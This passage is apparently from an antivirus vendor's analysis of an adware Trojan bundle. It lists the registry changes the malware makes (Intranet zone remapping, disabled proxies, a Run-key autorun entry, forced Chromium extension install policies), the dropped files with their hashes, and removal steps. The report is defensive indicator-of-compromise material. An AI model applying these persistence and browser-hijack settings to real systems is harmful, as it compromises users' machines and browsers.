"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
The process %original file name%.exe:1332 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VOPackage]
"isnw" = "7"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\NUIns]
"isnw" = "7"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\APPackage]
"isnw" = "7"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "04 27 F1 88 0E E1 75 18 33 F1 61 EB 6C 2F 8C 6C"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\YSPackage]
"isnw" = "7"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ASPackage]
"isnw" = "7"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process nsr1A.tmp:2012 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C5 94 7D 8D DD B7 45 67 F5 A0 16 99 EB A9 8A C7"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process nst16.tmp:264 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8D 5F F4 C3 D1 3D 20 02 09 11 EB 20 ED 21 F9 AA"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process nsw7.tmp:1224 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BD 8B 40 2E BA BA 89 2F 39 61 50 03 36 01 DD 79"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\System\CurrentControlSet\Services\NlaSvc]
"CMPK" = "-obi-tot-mdh-lvs-ppt-opw-jot-crr"
The process nsn24.tmp:1984 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Favorites" = "%Documents and Settings%\All Users\Favorites"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = ""
"NetHood" = "%Documents and Settings%\%current user%\NetHood"
"Fonts" = "%WinDir%\Fonts"
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"Setup3.exe" = "baidu Setup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"PrintHood" = "%Documents and Settings%\%current user%\PrintHood"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Templates" = "%Documents and Settings%\%current user%\Templates"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Administrative Tools" = "%Documents and Settings%\All Users\Start Menu\Programs\Administrative Tools"
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Templates" = "%Documents and Settings%\All Users\Templates"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Administrative Tools" = ""
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
"SendTo" = "%Documents and Settings%\%current user%\SendTo"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "36 F8 10 64 69 5D 7A C5 76 47 62 07 CB 12 CB A6"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CD Burning" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\CD Burning"
"Recent" = "%Documents and Settings%\%current user%\Recent"
"Favorites" = "%Documents and Settings%\%current user%\Favorites"
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process setup3.exe:408 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B1 01 3C 9B AC CA EA 5D 94 CA E5 B2 F5 8C 9F 05"
The process nsoB.tmp:284 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "46 F8 D3 59 A7 F6 6C A4 6E F7 B5 F6 2A 37 1F 4D"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process adv_128.exe:1276 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F2 1F 37 31 23 99 9D 0E 3A 97 E2 F4 64 72 1C 3D"
[HKLM\SOFTWARE\Policies\Chromium\ExtensionInstallSources]
"1" = "http://ext.internetquickaccess.com/*"
[HKLM\SOFTWARE\Policies\Chromium\ExtensionInstallForcelist]
"1" = "pcjnhdkacfipfoicilllfabpbghiegpn;http://ext.internetquickaccess.com/extensions/internetquickaccess/updates.php?id=pcjnhdkacfipfoicilllfabpbghiegpn"
The process setup3.tmp:1040 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "81 BB 33 3D 28 F3 1B E8 6D 54 26 0D 95 44 D7 18"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\baidu]
"bind.exe" = "Bind"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"apphide" = "%Program Files%\baidu\ppt.exe"
Dropped PE files
| MD5 | File path |
|---|---|
| a85df53ac3cdc0b948809c73b39b0571 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\avg18.exe |
| 3eff59fc48dd082035f2c09e2d45b0f8 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsh1D.tmp |
| f02155fa3e59a8fc48a74a236b2bb42e | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsk3.tmp\inetc.dll |
| d70820984ba4484885bf5c56ae44c4ec | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nskE.tmp |
| a66865416d1330f1c571c12f4f8c2fea | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsr1A.tmp |
| 29bf30427bc3544fab563d0d7d36f05d | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nst16.tmp |
| 2b7007ed0262ca02ef69d8990815cbeb | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nst20.tmp\registry.dll |
| 2b7007ed0262ca02ef69d8990815cbeb | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nst22.tmp\registry.dll |
| a66865416d1330f1c571c12f4f8c2fea | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\7121923af824073a25b2b7e6ba0a6e0e[1].exe |
| 29bf30427bc3544fab563d0d7d36f05d | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\prepreinstaller_win[1].exe |
| 3eff59fc48dd082035f2c09e2d45b0f8 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\Bundle_OperaRUnew[1].exe |
| dd326cafa8f8dfb20c5183a1cc3daab6 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\cmmdWriter[1].exe |
| 900c797ab605bac6ba0de7e9aba3e7d7 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\L5lD0nHnr[1].exe |
| a85df53ac3cdc0b948809c73b39b0571 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\SilentInstaller_dotnet4[1].exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
nsh1D.tmp:260
nsh1D.tmp:1264
Bind.exe:776
amisid.exe:828
ppt.exe:1788
%original file name%.exe:1332
nsr1A.tmp:2012
nst16.tmp:264
nsw7.tmp:1224
nsn24.tmp:1984
setup3.exe:408
nsoB.tmp:284
setup3.tmp:1040 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\post_reply.htm (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\inetc.dll (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\md5dll.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\registry.dll (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\nsisos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\checks.txt (544 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\thankyou[1].php (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst22.tmp\amisid.exe (909 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst20.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst20.tmp\amisid.exe (909 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst20.tmp\registry.dll (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst20.tmp\checks.txt (544 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\f9626892-7a78-3199-abd2-97bbce96297b\adv_128.exe (1188757 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn8.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb11.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl19.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\pptxd[1].exe (47264 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\cmmdWriter[1].exe (6872 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj27.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoA.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst16.tmp (36464 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa28.tmp (150707 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv29.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2A.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw7.tmp (6872 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\7121923af824073a25b2b7e6ba0a6e0e[1].exe (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszF.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg5.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseC.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy25.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\prepreinstaller_win[1].exe (36464 bytes)
